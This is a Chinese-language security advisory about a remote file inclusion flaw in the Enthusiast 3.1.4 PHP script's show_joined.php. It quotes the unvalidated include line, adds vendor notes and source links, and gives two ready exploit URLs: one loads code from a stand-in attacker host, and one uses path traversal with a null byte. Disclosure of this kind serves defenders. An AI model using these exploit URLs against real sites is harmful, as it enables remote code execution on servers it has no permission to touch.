Enthusiast show_joined.php远程文件包含漏洞


添加时间:
2008-12-09

系统编号:
WAVDB-01281
BUGTRAQ: 32205

影响版本:
Enthusiast 3.1.4

程序介绍:

Enthusiast是一个成员列表集中管理脚本。

漏洞分析:

Enthusiast的show_joined.php文件没有正确地验证对path参数的输入参数便用于包含文件:

/show_joined.php #line:261-264

 
  1. <p class="show_joined_credits">  
  2. <a href="http://scripts.indisguise.org">Powered by Enthusiast  
  3. <?php include $path . 'show_enthversion.php' ?></a>  
  4. </p>  

远程攻击者可以通过包含本地或外部资源的任意文件导致执行任意代码。成功攻击要求打开了register_globals。



漏洞利用:

http://example.com/enth_3.1.4/enth3/show_joined.php?path=http://evilsite/
http://example.com/enth_3.1.4/enth3/show_joined.php?path=../../evilscript.php%00

解决方案:
厂商补丁:
Indiscripts
 -----------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://scripts.indisguise.org/enthusiast/

信息来源:
<*来源:AmnPardaz Security Research Team (admin@bugreport.ir)    
   链接:http://secunia.com/advisories/32628/
         http://marc.info/?l=bugtraq&m=122624216517659&w=2
 *>